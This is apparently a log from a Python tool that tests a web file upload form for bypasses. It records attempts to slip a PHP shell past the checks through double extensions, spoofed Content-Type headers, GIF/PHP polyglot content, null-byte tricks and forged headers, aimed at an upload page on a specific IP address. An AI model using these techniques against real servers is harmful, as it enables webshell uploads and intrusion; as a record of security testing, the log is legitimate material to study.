Muxun_programs/python/upload_test_log.txt
Galaxy 907bd5af0e mx init
the muxun is not operated by git, now init
2025-11-09 20:06:06 +08:00

============================================================
[*] 1. 探测文件扩展名
============================================================
[+] Allowed extension: .txt
[结论] 允许的扩展名: .txt
============================================================
[*] 2. 文件名绕过技巧 (基础扩展名: .txt)
============================================================
[+] Filename trick success: 双扩展名1 | shell.php.txt
============================================================
[*] 3. Content-Type 绕过检测 (文件: test.txt)
============================================================
[+] Content-Type bypass: image/jpeg
[+] Content-Type bypass: image/png
[+] Content-Type bypass: image/gif
[+] Content-Type bypass: image/bmp
[+] Content-Type bypass: text/plain
[+] Content-Type bypass: text/html
[+] Content-Type bypass: text/xml
[+] Content-Type bypass: application/octet-stream
[+] Content-Type bypass: application/x-php
[+] Content-Type bypass: application/json
[+] Content-Type bypass: multipart/form-data
[+] Content-Type bypass: application/x-www-form-urlencoded
[+] Content-Type bypass: application/zip
[+] Content-Type bypass: application/pdf
[+] Content-Type bypass: invalid/type
============================================================
[*] 4. 文件内容绕过检测 (扩展名: .txt)
============================================================
[+] Content bypass: 纯文本
[+] Content bypass: GIF文件头
[+] Content bypass: PHP标签
[+] Content bypass: 短标签
[+] Content bypass: GIF+PHP
[+] Content bypass: PHP+GIF
[+] Content bypass: JS脚本
[+] Content bypass: HTML+PHP
[+] Content bypass: Base64编码PHP
[+] Content bypass: UTF-16 BOM + PHP
[+] Content bypass: 注释包裹PHP
[+] Content bypass: 空字节截断内容
[+] Content bypass: 超大文件
============================================================
[*] 5. 请求头与参数绕过检测
============================================================
[+] Header bypass set 1: {'User-Agent': 'Mozilla/5.0'}
[+] Header bypass set 2: {'User-Agent': 'curl/7.68.0'}
[+] Header bypass set 3: {'X-Forwarded-For': '127.0.0.1'}
[+] Header bypass set 5: {'Referer': 'http://123.60.191.166/upload.php'}
[+] Header bypass set 6: {'Authorization': 'Basic dXNlcjpwYXNz'}
[+] Header bypass set 7: {'Cookie': 'sessionid=abc123'}
============================================================
[*] 1. 探测文件扩展名
============================================================
[结论] 未发现允许的扩展名